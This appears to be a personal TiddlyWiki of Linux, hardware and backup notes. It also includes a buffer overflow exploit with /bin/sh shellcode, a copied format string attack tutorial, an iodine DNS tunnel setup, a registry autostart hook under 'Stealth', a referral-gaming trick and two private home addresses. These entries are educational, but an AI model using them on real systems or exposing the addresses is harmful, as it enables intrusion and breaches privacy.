Welcome to TiddlyWiki created by Jeremy Ruston; Copyright © 2004-2007 Jeremy Ruston, Copyright © 2007-2011 UnaMesa Association
!static network
{{{
auto eth1 # come up automatically
iface et1 inet static
address 192.168.0.24
netmask 255.255.255.0
# gateway 192.168.0.23
}}}
! for wpa_supplicant
{{{
auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid meinessid
wpa-psk meinpasswort
}}}
Type the text for '16 May 2013'
!usb hotplugging
hotfix for not nonfuct hotplugging (which is probably a problem with either laptop-mode,udev,dbus or usb-autosuspend)
{{{
modprobe -r uhci-hcd
modprobe uhci-hcd
}}}
!brightness
/sys/class/backlight/acpi_video0/brightness
!fan control
via module acerhdf_kmod ( http://piie.net/index.php?section=acerhdf )
add line for my bios to the array of supported hw in acerhdf.c :
{{{
/* Acer 1810TZ */
/// changed in new version
{"Acer", "Aspire 1810TZ", "v0.3108", 0x55, 0x58, {0x9e, 0x00} },
{"Acer", "Aspire 1810TZ", "v0.3113", 0x55, 0x58, {0x9e, 0x00} },
{"Acer", "Aspire 1810TZ", "v0.3115", 0x55, 0x58, {0x9e, 0x00} },
{"Acer", "Aspire 1810TZ", "v0.3117", 0x55, 0x58, {0x9e, 0x00} },
}}}
!Synaptic Touchpad
Fix crappy touchpad, enable twofinger scrolling
in {{{ /etc/X11/xorg.conf.d/96-synaptics-twofinger.conf }}}
{{{
Section "InputClass"
Identifier "touchpad two finger scrolling"
MatchIsTouchpad "on"
MatchDevicePath "/dev/input/event*"
Option "HorizScrollDelta" "0"
Option "MinSpeed" "0.5"
Option "MaxSpeed" "0.5"
#Option "AccelFactor" "0.0010"
Option "EmulateTwoFingerMinZ" "40"
Option "EmulateTwoFingerMinW" "11"
Option "VertTwoFingerScroll" "True"
Option "HorizTwoFingerScroll" "True"
Option "VertEdgeScroll" "False"
Option "HorizEdgeScroll" "False"
Option "JumpyCursorThreshold" "250"
Driver "synaptics"
EndSection
}}}
! asoundrc
!! find <card>,<device>
see aplay -l
!! get hdmi sound working
in /etc/asoundrc (or ~/.asoundrc )
{{{
pcm.!default {
type plug
slave {
pcm "hw:<card>,<device>"
rate 48000
}
}
}}}
!! use dmix instead of direct device
{{{
pcm.dmixer {
type dmix
ipc_key 1024
ipc_key_add_uid false
ipc_perm 0660
slave {
pcm "hw:0,0"
rate 48000
channels 2
format S32_LE
period_time 0
period_size 1024
buffer_time 0
buffer_size 4096
}
}
pcm.!default {
type plug
slave.pcm "dmixer"
}
}}}
! mplayer with different device
{{{
mplayer -ao alsa:device=bluetooth FILE # play over bluetooth
mplayer -ao alsa:device=hw=2.0 FILE # play over different hardware card (like usb audio)
}}}
! generate credentials
go to https://aws-portal.amazon.com/gp/aws/developer/account/index.html
! install ec2 webservices
{{{
#? /bin/bash
wget http://s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip
unzip ec2-api-tools.zip
mv ec2-api-tools .ec2
echo "mv ~/Downloads/*.pem .ec2"
read "you will probably need to do this"
cd .ec2
cat > change_env << EOF
export EC2_HOME=~/.ec2
export PATH=$PATH:$EC2_HOME/bin
export EC2_PRIVATE_KEY=`ls $EC2_HOME/pk-*.pem`
export EC2_CERT=`ls $EC2_HOME/cert-*.pem`
export JAVA_HOME=/opt/java/jre
EOF
source change_env
ec2-describe-images -o amazon
ec2-create-keypair bobkhan >bobkhan.pem
ec2-authorize default -p 22
}}}
! create instance
{{{
cd
source .ec2/change_env
ec2-run-instances ami-8c1fece5 -k bobkhan -t t1.micro
ec2-describe-instances
#look for the global dns name
ssh -i bobkhan.pem ec2-user@$ec2-instance-name
}}}
! using binwalk
!! extract filesystem
{{{
$ binwalk openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-sysupgrade.bin
DECIMAL HEX DESCRIPTION
-------------------------------------------------------------------------------------------------------------------
512 0x200 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2910740 bytes
957612 0xE9CAC Squashfs filesystem, little endian, version 4.0, compression: size: 2356427 bytes, 653 inodes, blocksize: 262144 bytes, created: Mon Sep 23 20:26:40 2013
$ dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-sysupgrade.bin skip=957612 bs=1 of=fs.squashfs
$ unsquashfs fs.squashfs
}}}
!! Entropy analysis
{{{
binwalk -E binary
}}}
! Melissa Tiono
!! Zuhause
Ludwig-Roselius-Allee 89
28329 Bremen
Haltestelle: Wilhelm busch weg
! Silvia Richter
Dahmestr. 8
Haltestelle: Joachimstr
!Troubleshooting
* Rauschen
* check with:
{{{ arecord -D bluetooth -f S16_LE | aplay -D bluetooth -f S16_LE}}}
* physically disconnect bluetooth and connect again
* unpair headset
{{{/etc/rc.d/bluetooth restart}}}
{{{bluetooth-applet}}} # connect to bt-headset again
//check again
! TFTP Flashing
Problem:
- The Error LED is blinking 6x short (No firmware found)
!! Bring into Recovery Mode
{{{
ifconfig eth0 192.168.11.1 up
ethtool eth0 # just to see if ethernet is working and link is up
# the TFTP Boot stuff
wget -O tftp.rar http://download.discountnetz.com/tftp-boot-recovery/TFTP%20Boot%20Recovery%201.53.rar
unrar x tftp.rar
cd TFTP*
sudo in.tftpd -l -s -L $PWD
# press the "function Button", the blue Power LED is blinking
}}}
!! Flash The new Firmware
{{{
(Shell 1) dnsmasq -d --dhcp-range=192.168.11.50,192.168.11.150,12h
(Shell 2)
# The firmware plus updater
wget -o ls.zip http://cdn.cloudfiles.mosso.com/c85091/ls_series-164.zip
unzip ls.zip
cd ls_series*
sed -i 's/NoFormatting.*/NoFormatting = 0/' LSUpdater.ini
# optionally echo 'Debug = 1' >> LSUpdater.ini
pacman -S wine
# Cross Fingers
wine LSUpdater.exe
# Yes Yes Yes, Wait for quite some time
# LinkStation will reboot, flash red again, press function again, LinkStation will blink somewhat different -> Success
}}}
!! More Tips:
- FAQ 1: http://forums.buffalotech.com/t5/Storage/FAQ-1-of-5-EM-Mode-boot-procedures/td-p/100313
- FAQ 2: http://forums.buffalotech.com/t5/Storage/FAQ-2-of-5-Force-Firmware-update-procedure/td-p/100317
- FAQ 3: http://forums.buffalotech.com/t5/Storage/FAQ-3-of-5-TFTP-boot-procedure/td-p/100319
!my first BOF
http://smashthestack.org/l3thal/bof.txt
$ vuln.c
int main(int argc, char * argv[]) {
char buf[256];
ie(argc == 1) {
printf("Usage: %s input\n", argv[0]);
exit(0);
}
strcpy(buf,argv[1]);
printf("%s", buf);
}
./vuln `perl -e 'print "\x90"x244 ."\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
## we create a nop-bridge, trying to hit "deadbeef" directly
## this will be buffer+padding-shellcode(25 byte)
## check via
## gdb -c core.17916
## #0 0x41414141 in ?? ()
## (gdb) i r <= info register
## after 0 0xdeadbeef in ?? ()
## find the nop bridge, hit in it
## (gdb) x/10s $esp
...
0xbfffd8fc: '\220' <repeats 200 times> <= nops
...
## just hit in the middle of it
./vuln `perl -e 'print "\x90"x244 ."\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
Value Proposition
Common Baseline
Customer Benefit
Transformation Plan
Integration Services
Managed Services
Stakeholder
Definition and Design of Transformation Roadmap
Key Solutions
Customer Intimacy
Domain Expertise
Opportunity
Qualification
Contracting
High-profile
Budgetary Offer
Upscope
Outtasking
Benchmark
Traction
! Quirks
Firefox 100 percent:
position:absolute
!Dump stuff collected
!! Skytraq + Configuration
{{{
svn checkout http://skytraq-datalogger.googlecode.com/svn/trunk/ skytraq-datalogger
make
./skytraq-datalogger --dump > here.gpx
}}}
!! GPSBabel
{{{
gpsbabel -t -i skytraq -f /dev/ttyUSB0 -ogpx -F here.gpx
}}}
!Mapping it
http://www.gpsvisualizer.com/map_input?form=google
! Working ssh
{{{
# create password:
# echo -n lolwut | mkpasswd -s
in kernel line:
usercrypted=<created-password> ocs_daemonon=ssh
ssh user@ip-addr
# get into menu
CURRENT_TTY=/dev/tty1 /opt/drbl/sbin/ocs-live-general
}}}
- http://www.pwcrack.com/penetration_contract.shtml
- http://seclists.org/pen-test/2005/Jun/307
- http://www.pentest-standard.org/index.php/Pre-engagement
!Server-Side
{{{
useradd -r tun
iodined -f 172.16.0.1 io.krebsco.de -u tun -P "aidsballs" -t /home/tun -c
}}}
!Client-Side
{{{
# -r skips direct mode (good for testing)
sudo iodine -f -I1 io.krebsco.de
}}}
! Testing
http://code.kryo.se/iodine/check-it/
http://dnscurve.org/dnssecamp.html
http://dx.com
! affiliate
add : ?Utm_rid=93398939&Utm_source=affiliate
e.g: https://dx.com/p/2-0-lcd-display-electromagnetic-radiation-detector-black-1-x-6f22-170486?Utm_rid=93398939&Utm_source=affiliate
!Reconfigure packages
{{{
dpkg-reconfigure <package-name>
}}}
!updating rc.d on startup
{{{
update-rc.d
or
sysv-rc-conf
}}}
! Change Keyboard Layout:
{{{
dpkg-reconfigure console-setup
}}}
[[pandaboard]]
[[beagleboard]]
[[Minimus AVR]]
! Installation
Debian: http://www.dokuwiki.org/install:debian
!SSH on dotcloud
create DSA Key
{{{
ssh -i ~/.ssh/here.dsa dotcloud@tinc.krebs.dotcloud.com -p 5960
}}}
! generate a new referral
1. Generate a new account (mail not necessary
Probably with anonbox script for mail
2.
{{{
#? /bin/bash
ec2-describe-instances
ssh -i bobkhan ec2-user@$EC2_INSTANCE
wget -O dropbox.tar.gz "http://www.dropbox.com/download/?plat=lnx.x86"
tar -tzf dropbox.tar.gz
~/.dropbox-dist/dropboxd
# click the link
}}}
! install
{{{
#?/bin/sh
# pacman -S /apt-get install / yum install duplicity gpg pwgen
wget http://downloads.sourceforge.net/project/ftplicity/duply%20%28simple%20duplicity%29/1.5.x/duply_1.5.10.tgz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fftplicity%2F%3Fsource%3Ddlp&ts=1372694343&use_mirror=hivelocity -O duply.tgz
tar xf duply.tar.gz /tmp
mkdir ~/bin
cp -a /tmp/duply_1.5.10/duply ~/bin
}}}
! configure
{{{
pwgen 24 # take the first
gpg --gen-key
# click through
# in other shell to generate entropy
# $ find /var/ /usr /lib /srv -type f -print0 | xargs -0 cat > /dev/null
gpg --list-secret-key
# take the sec/[part]
duply remote create
cd ~/.duply/remote/
cat > conf <<EOF
GPG_KEY="[part]"
GPG_PW="[the first]"
TARGET="[[see schemes]]"
SOURCE="/" # full backup
VERBOSITY=5
MAX_FULLBKP_AGE=1m # create full backups every month
EOF
# for full backup
cat > exclude <<EOF
/mnt
/tmp
/dev
/sys
/proc
/run
/media
/var/
/root/.cache/duplicity
EOF
# backup $PWD folder somewhere safe
}}}
! scheduling
{{{
echo "duply remote backup" > /etc/cron.daily/duply-remote
chmod +x /etc/cron.daily/duply-remote
}}}
! schemes
{{{
# file:///some_dir
# ftp://user[:password]@other.host[:port]/some_dir
# hsi://user[:password]@other.host/some_dir
# cf+http://container_name
# imap://user[:password]@host.com[/from_address_prefix]
# imaps://user[:password]@host.com[/from_address_prefix]
# rsync://user[:password]@other.host[:port]::/module/some_dir
# rsync://user[:password]@other.host[:port]/relative_path
# rsync://user[:password]@other.host[:port]//absolute_path
# # for the s3 user/password are AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY
# s3://[user:password]@host/bucket_name[/prefix]
# s3+http://[user:password]@bucket_name[/prefix]
# scp://user[:password]@other.host[:port]/some_dir
# ssh://user[:password]@other.host[:port]/some_dir
# tahoe://alias/directory
# webdav://user[:password]@other.host/some_dir
# webdavs://user[:password]@other.host/some_dir
}}}
! Get the shit out again with duplicity on another host
{{{
cd .duply/backup
gpg --import < gpgkey.<HEX>.sec.asc
grep GPG_PW conf
duplicity --encrypt-key=<HEX> --archive-dir=other-archivedir --name=darth --tempdir=other-tempdir restore --file-to-restore path/to/file/in/archive file://. path/to/restore
}}}
! generate entropy
!! haveged
{{{
pacman -S haveged
systemctl start haveged
}}}
!! rng-tools
{{{
pacman -S rng-utils
rngd -f -r /dev/urandom
}}}
! Testing without Environment
for example for cron scripts to unset all the environment variables
{{{
env -i /bin/sh
}}}
!Proxies
in /etc/bash.bashrc
{{{
export http_proxy=http://.../
export https_proxy=http://.../
export ftp_proxy=ftp://.../
}}}
in /etc/apt/apt.conf.d/01proxy
{{{
Acquire::http::Proxy "http://host:3128";
}}}
Check Antivirus Vendors: http://www.virustotal.com
[[Buffer Overflows]]
[[Format String Attack]]
[[DNSSec Amplification]]
* 26 zoll
!Gangschaltung
* Shimano
* Diore (LX)
!Bremsen
* Vbrake
!Rahmen
* Alurahmen
{{{
Mountainbike Rennrad Tourenrad/Citybike Trekking-/Reiserad
Körpergröße (cm) Rahmen (cm) Rahmen (Zoll) Rahmen (cm) Rahmen (cm) Rahmen (Zoll) Rahmen (cm)
175-180 43-46 17-18 55-57 48-54 19-21 55-58
180-185 46-48 18-19 57-60 54 21 58-61
185-190 48-53 19-21 60-62 54-57 21-22 61-63
}}}
! Federgabe
*
! umount
{{{
fuser -amuv /path/to/mount
kill dat-shit
}}}
! umount nfs
{{{
umount -l /path/to/nfs
}}}
From http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html (too bad the page is down)
<html>
<table border="1" align="center" width="70%">
<tbody><tr>
<td> Attack Name:</td>
<td> <b>Format String <Attack</b> </td>
</tr>
<tr>
<td> What does the attack accomplish?</td>
<td><ul>
<li> Reading or Writing at arbitary locations in memory (including stack)</li>
<li> Code Execution: Inserting shellcode into stack and changing the return address (without buffer overflow)</li>
</ul>
</td>
</tr>
<tr>
<td> What is the vulnerability?</td>
<td> Code containing <pre>printf(variable);</pre> instead of <pre>printf("%s",variable);</pre> where variable is affected by user input</td>
</tr>
<tr>
<td> Background</td>
<td> The printf function in c takes variable number of arguments. The first argument is usually the "format string", followed by variables referenced in the format string.<br><br> For eg. <pre>printf("There are %d numbers in %s",arg1,arg2);</pre> Here %d and %s are the parameter specifiers in the format string. The first specifier uses arg1 and the second uses arg2.
<br><br>
During a call to printf, these arguments are passed on the stack (in the stack frame of printf). Here is the process of execution.
<ul>
<li>First of all, printf reads the first argument (format string).</li>
<li>It prints all characters execept those that start with '%'</li>
<li>On seeing '%' (i.e. parameter specifier), it fetches the next argument(here arg1) from the stack.</li>
<li>It will typecast argument according to the specifier and then print it.</li>
<li>This all continues till the end of the format string</li>
</ul>
<br><br>
Common specifiers:
<table>
<tbody><tr><td>%d</td><td>Reads a demical integer</td></tr>
<tr><td>%ld</td><td>Reads a long demical integer</td></tr>
<tr><td>%c</td><td>Reads a character</td></tr>
<tr><td>%x</td><td>Reads a hexademical integer</td></tr>
<tr><td>%lx</td><td>Reads a long hexademical integer</td></tr>
<tr><td>%s</td><td>Reads a String</td></tr>
<tr><td>%n</td><td>Writes the number of characters printed till now</td></tr>
</tbody></table>
<br>
*In case of %s and %n Addresses of variable are stored in stack.
</td>
</tr>
<tr>
<td> How does it works?</td>
<td>
To understand the vulnerability, let us try this small code first.
<pre>int main(){
int i=21;
int j=5;
printf("%d %d %d %d %d %d %d %d %d\n");
return 0;
}
output:
-1890278264 -1890278248 0 -2066296096 -2090799136 -1890278272 21 0 -2069764746
</pre>
Even though there are no more arguments to printf, the code worked. The output may look as garbage values, but these values come from the stack. As can be noticed, value of i (21) is also in the output. To confirm it, change value of i and rerun.
<br><br>
Also as we know <pre>printf(str); //works</pre>
If that 'str' is input from user, then user can enter string containing format specifiers, rather than normal string.
This is the basis of format string attack.
<br> So for example
<pre>int main(int argc, const char * argv[]){
char buf[160];
strcpy(buf,argv[1]);
printf(buf);
exit(0);
}
Run:
./a.out "hello %d"
output:
hello 2126824952
</pre>
</td>
</tr>
<tr>
<td> Attack Details: Reading from stack </td>
<td>
Reading from stack using format string is easy. We just have to use the format specifiers.
<br><br>For eg <a name="example1">"example1"</a>
<pre>int main(int argc, const char * argv[]){
int i=3;
int j=4;
int k=5;
int l=6;
char buf[160];
strcpy(buf,argv[1]);
printf(buf);
exit(0);
}
</pre>
Crafting input
<br>
1)Using perl to get the string %08x %08x ... %08x (20 times) (here 20 is just a choice)
<pre>./example1 "`perl -e 'print "%08x " x 20 '`"
output:
14fa05f0 14f9eaf4 00000000 fefefeff 00000000 14f9ec18 00000000 78383025 30252078 20783830 38302520 25207838 78383025
30252078 20783830 38302520 25207838 78383025 30252078 20783830
</pre>
See that 25 30 38 78 20 are getting repeated again and again in the end. These bytes are nothing but hexademical representation of ascii for "%08 "
<br>
<br>
That means we are reading variable buf from stack frame.
Variable buf starts at the 8th %08x and its size is 160bytes. So it will take 20 "%08x" on 64bit machine. In case of 32 bit machine, it will take 40. (See <a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#Idiosyncrasy">Idiosyncrasy</a> for more details)
<br>
So in case of a 64 bit machine, variable i will be at 28th parameter. Lets check it out.
<br><br>
2)Directly reading 28th parameter
<pre>./example1 "%28\$d"
output:
3
</pre>
where 3 is value of variable i. <br>
As can bee seen, to directly access mth parameter use %m$d. The '\' was used to escape $ from bash shell.
<br>
Please note that on 64bit system, 29th parameter will not be j but will be k. To know why, see <a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#Idiosyncrasy">Idiosyncrasy</a>.
</td>
</tr>
<tr>
<td> Attack Details: Reading from arbitary memory address</td>
<td>
Remember that %s and %n works on addresses rather than values. Out of these two %s is the one that can read. So we need to place the address of the memory location on stack, and then call %s to read content of that location.
<br><br>Consider eg <a name="example2">"example2"</a>
<pre>char hiddencode[4];
int main(int argc, const char * argv[]){
strcpy(hiddencode,"007");
printf("hidden code is at %p. Find the value of hidden code.\n",&hiddencode);
char buf[160];
strcpy(buf,argv[1]);
printf(buf);
exit(0);
}
</pre>
The varible buf is on the stack. As the argument we pass will be copied in buf, we now have a way to insert the address in to the stack i.e. Placing the address in the format string itself.<br>
If you run the program with any input, it will print address of variable hidden code.
<pre>./example2 a
output:
hidden code is at 0x600a30. Find the value of hidden code.
a
</pre>
So now we know that the address to read from is 0x00600a30. For attack to work, this address should be part of the format string.We are lucky that the Null byte is at the highest order byte. We cannot have null byte in our input string (because that marks the end of that string). As i am using a little endian machine, bytes ordering is reversed. And so Highest order byte is to be inputed at last.(ie input will be 30 0a 60 00). So this should be the last 4 bytes of our format string.
<br>Now try the following:
<pre>./example2 "%09\$s `printf "\x30\x0a\x60"`"
output:
hidden code is at 0x600a30. Find the value of hidden code.
007 0
</pre>
As you can see, we got 007. Let us understand how.
<br>
We know that buf starts at the 8th parameter on 64bit system. So we place the address on 9th parameter and called %s for 9th parameter. If we had started by putting address on 8th parameter, then null byte would have caused trouble. Also note the use of spaces to start the address on next word(8bytes for 64bit system)
</td>
</tr>
<tr>
<td> Attack Details: Writing at arbitary memory address </td>
<td>
Here we will use %n instead of %s on the above >example. To make sure we have modified the variable add a printf after printf(buf);
<pre>printf("%s",hiddencode);
</pre>
<br> To make the hidden code null, do this
<pre>./example2 "%09\$n `printf "\x30\x0a\x60"`"
</pre>
%n will write at 00600a30. It will write the value 0 because no character is yet printed by printf. To write other values, you must preceed %n with some text or format characters. Quick way to get 5 there, is "%5c%09\$n`printf "\x30\x0a\x60"`". Also that address should be aligned to start from a new word(8bytes for 64bit system). Use spaces to solve this.
</td>
</tr>
<tr>
<td>Difficulties</td>
<td>
<ul>
<li> If the address that needs to be written contains Null byte, it may become impossible to write</li>
<li> To execute shellcode, there should be a page in memory that is both writable and executable</li>
<li> It is difficult to know address of a variable or a function, without debugging source code</li>
</ul>
</td>
</tr>
<tr>
<td><a name="Idiosyncrasy">Idiosyncrasy</a></td>
<td>
There are some differences when attacking a 32bit system as compared to a 64bit system.
<ul>
<li>When we input multiple %08x reading of buf starts at 5th parameter in 32 bit system, whereas as seen above, it started at 8th parameter</li>
<br>
<li>Every parameter access will fetch 4 bytes in case of 32 bit system, but it will fetch 8 bytes in 64 bit system
</li>
<br>
<li>Reconsider <a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#example1">example1</a>
<br>
<b>For a 64 bit system</b>
<pre>./example1 "%28\$d"
</pre>
This will output value of i. 'i' is integer(4 bytes) but a parameter is 8 byte. And so there will be truncation of 4 bytes.
<br>
When you do,
<pre>./example1 "%29\$d"
</pre>
you will get k and not j. Reason is that value of j was fetched with that of i (then was truncated).
<br>
So what if you want to access both i and j? Instead of using %d use %lx. Because %lx will not truncate and will display you all the 64 bits.
<pre>./example1 "%28\$lx"
</pre>
You will get j followed by i(little endian).
<br><br>
<b>For a 32 bit system</b>
<br><br>
buf starts at 5. As each parameter is 4byte, it will end at 44 and so i will be 45th parameter.
<pre>./example1 "%45\$d"
</pre>
This will give you value of i.Variable j will be next, followed by k and l.
<pre>./example1 "%46\$d"
</pre>
This will give you value of j. And so on.
<br>
<br>
</li><li>Similarly for other attacks(read and write to memory),use %6\$n instead %9\$%n for 32 bit system (Add do watch the spaces that were used to complete 8bytes.)</li>
</ul>
</td>
</tr>
</tbody></table>
</html>
! FreeNas Package Installation
{{{
mount -o rw /
pkg_add tinc
mount -o ro /
}}}
To get started with this blank [[TiddlyWiki]], you'll need to modify the following tiddlers:
* [[SiteTitle]] & [[SiteSubtitle]]: The title and subtitle of the site, as shown above (after saving, they will also appear in the browser title bar)
* [[MainMenu]]: The menu (usually on the left)
* [[DefaultTiddlers]]: Contains the names of the tiddlers that you want to appear when the TiddlyWiki is opened
You'll also need to enter your username for signing your edits: <<option txtUserName>>
Also see [[Software Raid]]
! Softraid + Crypto + LVM
!! Level 1: Softraid
{{{
sudo mdadm --create /dev/md0 --level=5 --raid-devices=2 /dev/sdd1 /dev/sdb
cat /proc/mdstat
mdadm --misc --detail /dev/md0
# make it faster on retard pcs
echo 8192 > /sys/block/md*/md/stripe_cache_size
}}}
!! Level 2: (wait and then) Crypto
{{{
# aes-cbc-essiv:sha256 is old
cryptsetup -c aes-xts-plain64 -s 256 luksFormat /dev/md0
cryptsetup luksOpen /dev/md0 array1
}}}
!! Level 3: LVM
{{{
pvcreate /dev/mapper/array1
vgcreate -v cryptvg /dev/mapper/array1
lvcreate -l 100%FREE -n files1 cryptvg
}}}
!! Level 4: Format
{{{
mkfs.ext4 /dev/cryptvg/files1
}}}
!! Level 5: INITRD
!!! Archlinux
{{{
# in /etc/mkinitcpio.conf
MODULES="dm_mod" # for root on softraid
HOOKS="... udev mdadm_udev encrypt lvm2 filesystems ... "
# in /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="cryptsetup=/dev/md127:array1 quiet"
}}}
!! extend Raid
{{{
mdadm --add /dev/md0 /dev/sdx1
mdadm --grow -n 3 /dev/md0grub
cat /proc/mdstat
mdadm --misc --detail /dev/md0
pvresize /dev/mapper/array1
cryptsetup resize array1
lvresize -l +100%FREE /dev/vg/files1
e2fsck -f /dev/vg/files1
resize2fs /dev/vg/files1
}}}
see also [[[Western Digitial Green]]] for information about special formating
! array wont assemble anymore
!! Find the problem
{{{
cat /proc/mdstat
mdadm -D --scan
mdadm -E --scan
mdadm -E /dev/sd[abce]1
}}}
!! Assemble manually
{{{
mdadm --stop /dev/md{0,127}
mdadm --assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1 /dev/sde1 --force
# /dev/sde1 fails to join the array
}}}
!! Add the broken device again
{{{
mdadm /dev/md0 --remove /dev/sde1
mdadm /dev/md0 --re-add /dev/sde1
#when this fails
mdadm --zero-superblock /dev/sde1 #reap the device
mdadm /dev/md0 --add /dev/sde1
echo 2000000 | sudo tee /proc/sys/dev/raid/speed_limit_min
echo 10000000 | sudo tee /proc/sys/dev/raid/speed_limit_max
sleep 40000
echo "FINISHED!"
}}}
! reaped the lvm
{{{
lvremote vg # killed the volumegroup, nice one
... #
vgcfgrestore -f /etc/lvm/archive/vg_00018-2146062166.vg -v vg #lvm is awesome and saves backups
}}}
Install
{{{pacman -S cups foomatic-{db,db-engine,filters}}}}
goto
{{{localhost:631/}}} and add HL2030 printer
!biohacking
[[habanero]]
!Information Gathering
[[Metadata]]
[[wmic]]
!Stealth
[[Using on-board Resources]]
!Wifi
[[aircrack suite]]
! Quirks
[[Acer1810tz]]
[[Lenovo T400]]
[[Buffalo LinkStation LS-WVL]]
!Internal
[[Intel SSD]]
[[Western Digitial Green]]
!Embedded
[[Dev Boards]]
[[mk808]]
!Peripheral
[[Canmore GT-730FL-S GPS-Datalogger]]
[[Bluetooth Headset]]
[[RT2870 WiFi]]
[[ReinerSCT]]
[[HL2030]]
[[UMTS Stick]]
[[Logitech G15]]
[[Silicon Images SATA Controller]]
!Consoles
[[Playstation2]]
! euer.krebsco.de
Welcome to my new `Blog`.
Feel free to browse around.
You might find something you find interesting, or not. Latest changes are in the timeline.
! Reach me
Twitter: @makefoo
IRC: irc.freenode.com #krebs
watch out for alignment:
{{{
fdisk -H 32 -S 32 -u /dev/sdx
mkfs.ext4 -b 4096 -E stride=32,stripe-width=32 /dev/sdx1
}}}
in fstab:
noatime
! Track Point Speed
{{{
# in /etc/rc.local
echo -n 250 > /sys/devices/platform/i8042/serio1/serio2/sensitivity
echo -n 250 > /sys/devices/platform/i8042/serio1/serio2/speed
}}}
!Tools
!!G15daemon
Basics, something is working (clock)
!! G15composer
Startup:
{{{
g15composer /tmp/g15pipe
}}}
Useful Commands:
{{{
echo 'TL "Hello" "World"' > /tmp/g15pipe #first line "hello", second line "world
echo 'MP 0' > /tmp/g15pip # to foreground
}}}
! G-Keys
{{{
G1 - XF86AudioRecord
G2 - XF86AudioRewind
G3 - XF86Phone
G4 - Keycode 178
G5 - XF86Tools
G6 - XF86HomePage
[ ] - XF86AudioStop
|<< - XF86AudioPrev
>>| - XF86AudioNext
>|| - XF86AudioStop
Mute - XF86AudioMute
M1 - XF86Launch6
M2 - XF86Launch7
M3 - XF86Launch8
MR - XF86Launch9
}}}
! Insert into local {{{~/.Xmodmap}}}
From {{{man g15daemon}}}
{{{
keycode 93 = XF86Launch1
keycode 129 = XF86Launch8
keycode 130 = XF86Launch9
keycode 131 = XF86Launch2
keycode 132 = XF86Phone
keycode 133 = XF86Messenger
keycode 136 = XF86LaunchD
keycode 137 = XF86Support
keycode 138 = XF86Word
keycode 143 = XF86LaunchF
keycode 144 = XF86AudioPrev
keycode 150 = XF86LogOff
keycode 152 = XF86Launch5
keycode 153 = XF86AudioNext
keycode 160 = XF86AudioMute
keycode 161 = XF86Travel
keycode 162 = XF86AudioPlay
keycode 163 = XF86Spell
keycode 164 = XF86AudioStop
keycode 170 = XF86VendorHome
keycode 174 = XF86AudioLowerVolume
keycode 176 = XF86AudioRaiseVolume
keycode 177 = XF86Launch4
keycode 178 = XF86HomePage
keycode 182 = XF86Away
keycode 183 = XF86WebCam
keycode 184 = XF86Launch0
keycode 188 = XF86Music
keycode 190 = XF86Launch6
keycode 194 = XF86Forward
keycode 195 = XF86Send
keycode 205 = XF86Calendar
keycode 208 = XF86Launch7
keycode 209 = XF86LaunchB
keycode 210 = XF86LaunchC
keycode 215 = XF86Save
keycode 219 = XF86WWW
keycode 220 = XF86LaunchE
keycode 223 = XF86Sleep
keycode 228 = XF86Pictures
keycode 231 = XF86LaunchA
keycode 236 = XF86Mail
keycode 237 = XF86AudioMedia
keycode 246 = XF86iTouch
keycode 247 = XF86Launch3
keycode 249 = XF86ToDoList
keycode 251 = XF86Calculater
}}}
! Hook Autostart
{{{
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bpk = < %windir%\System32\bpk.exe>
}}}
[[GettingStarted]]
[[Security]]
[[Hardware]]
[[Programming]]
[[Hacking]]
! Misc
[[TODO]]
[[Fun]]
[[RSS of this Blog|/wiki/knowledge_base.xml]]
! For Testing
!! Async test all executables in t/ according to TAP
{{{
usage:;cat Makefile
test:
@export PATH="$(CURDIR)/bin:$(PATH)"; \
tests="`find t -type f -executable`"; \
i=1; \
pids="";\
n=`echo "$$tests" | wc -l`; \
echo $$i..$$n; \
for exe in $$tests; do \
{ \
./$$exe; \
ret=$$?; \
case $$ret in 0) result=ok;; *) result='not ok';; esac; \
echo $$result $$i - $$exe; \
exit $$ret;\
} & \
pids="$${pids} $$!" \
i=$$(( i+1 )); \
done; \
ret=0;\
for pid in $$pids; do \
wait $$pid || ret=23;\
done; \
exit $$ret;
}}}
!! Sync test all executables in t/
{{{
usage:;cat Makefile
test:
@export PATH="$(CURDIR)/bin:$(PATH)"; \
tests="`find t -type f -executable`"; \
i=1; \
n=`echo "$$tests" | wc -l`; \
echo $$i..$$n; \
ret=0;\
for exe in $$tests; do \
./$$exe; \
thisret=$$?; \
case $$thisret in 0) result=ok;; *) result='not ok';ret=255;; esac; \
echo $$result $$i - $$exe; \
i=$$(( i+1 )); \
done; \
exit $$ret;
}}}
!wget + exiftool
{{{
wget -r -l1 --no-parent -A.jpg http://example.com
exiftool -r -h -a -u -gl * >output.html
}}}
! Videos
!! Methods
{{{
exiftool $file
tovid id $file
mplayer -vo null -ao null -identify -frames 0 $file
}}}
* add those tiny feet thingies
* try some code directly via serial (send when switch is closed)
!Direct compile with AVR-GCC
!! Installation
{{{
yaourt -S avr-gcc avr-libc dfu-programmer
}}}
!! Source Code
# port_test.c
{{{
#include <avr/io.h>
int main(void) {
DDRD = 0b01100000; /* LED Ports are in output mode */
PORTD = 0b10000000; /* Enable pull-up on PD7 */
while(1) {
if(PIND & (1<<PD7)) {
PORTD |= 1<<PD6; /* Red off */
PORTD &= ~(1<<PD5); /* Blue on */
} else {
PORTD |= 1<<PD5; /* Blue off */
PORTD &= ~(1<<PD6); /* Red on */
}
}
return 0;
}
}}}
!! Makefile
{{{
CPU=at90usb162 # Target is a Minimus
#CPU=atmega32u2 # Target is a Minimus 32
